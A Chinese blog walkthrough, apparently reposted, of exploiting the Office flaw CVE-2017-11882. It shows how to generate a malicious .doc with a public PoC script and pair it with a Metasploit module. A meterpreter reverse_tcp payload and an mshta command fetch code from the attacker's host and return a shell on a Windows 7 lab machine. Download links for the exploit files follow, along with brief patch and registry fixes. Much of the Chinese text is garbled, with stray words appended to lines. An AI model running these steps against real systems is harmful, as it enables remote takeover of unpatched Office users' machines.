CVE-2017-11882漏洞利用
CVE-2017-11882漏洞利用html
最新Office的CVE-2017-11882的poc刚刚发布出来,让人眼前一亮,完美无弹窗,无视宏,影响Ms offcie全版本,对于企业来讲危害很大。在此简单说下这个漏洞的复现和利用过程。python
POC地址:https://github.com/Ridter/CVE-2017-11882/git
下载Command43b_CVE-2017-11882.py脚本文件(文末分享云盘连接)。
github
使用的方法很简单,执行下面命令,生成漏洞doc文件。shell
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.docwindows
使用office 2013打开,直接执行。session
关于怎么进一步利用,能够利用msf进行攻击。tcp
这里有个小技巧,由于命令长度有43字符的限制,可使用URIPATH设置路径,尽可能短一点,避免加起来超过43字符。ui
这里我仔细说一下,但愿每一个人都能看懂。url
准备阶段:
kali:192.168.104
win7:192.168.1.132
win7里面的doc文件能够用office打开。个人win7虚拟机用的是office2013(文末分享)
首先打开kali,查看 IP,能够看到个人虚拟机kali的 IP是192.168.1.104。把Command43b_CVE-2017-11882.py下载下来放kali的桌面就能够。接下来就要把PS_shell.rb文件下载下来。就把PS_shell.rb和ms17-010.rb放一块儿吧。
ms17-010.rb文件的路径是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb,把PS_shell.rb放smb下面,和ms17-010在一块儿。
准备工做作好了,接下来就是msf上场了。
输入msfconsole,而后reload_all,从新加载全部模块。
接下来输入命令:search PS_shell
use /exploits/windows/smb/PS_shell
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.104
set uripath abc
exploit
会出现 started reverse tcp hander on 192.168.1.104:4444
using url,local ip,,,
mshta.exe "http://192.168.1.104:8080/abc"
接下来就到了 Command43b_CVE-2017-11882.py 上场了。
前面说到,咱们是把py文件放 kali 桌面的,因此在 kali 执行的时候路径要注意。
cd Desktop
输入命令:python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.104:8080/abc" -o test.doc
会在同目录生成 test.doc 文件。
而后复制到 win7里面用 office2013 打开。
win7 打开的时候,msf 输入 sessions
成功返回 shell。
具体请看截图,至此CVE-2017-11882漏洞利用结束,下面还能够进行一系列渗透了。
修复方案:
1.下载微软对此漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882,而且开启自动更新功能
2.在注册表中禁用该漏洞模块
reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400
Command43b_CVE-2017-11882.py:(连接: https://pan.baidu.com/s/1hslbc80 密码: 5ap6)
PS_shell.rb:(连接: https://pan.baidu.com/s/1gfF5jmN 密码: rkwy)
office2013:(连接: https://pan.baidu.com/s/1eSElsrC 密码: q66f)
本文连接(http://www.cnblogs.com/Oran9e/p/7880832.html),转载请注明。
任重而道远!
- 1. 漏洞利用
- 2. AJP13漏洞利用
- 3. redis漏洞利用
- 4. Dedecms5.7漏洞利用
- 5. nginx漏洞利用
- 6. kubelet漏洞利用
- 7. metaspliot漏洞利用
- 8. 漏洞利用与提权(二):Linux漏洞利用与提权
- 9. 漏洞利用——Sun-AnswerBook
- 10. CVE 2019-0708 漏洞利用
- 更多相关文章...
- • Maven Web 应用 - Maven教程
- • XML 用途 - XML 教程
- • Composer 安装与使用
- • 使用Rxjava计算圆周率
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 漏洞利用
- 2. AJP13漏洞利用
- 3. redis漏洞利用
- 4. Dedecms5.7漏洞利用
- 5. nginx漏洞利用
- 6. kubelet漏洞利用
- 7. metaspliot漏洞利用
- 8. 漏洞利用与提权(二):Linux漏洞利用与提权
- 9. 漏洞利用——Sun-AnswerBook
- 10. CVE 2019-0708 漏洞利用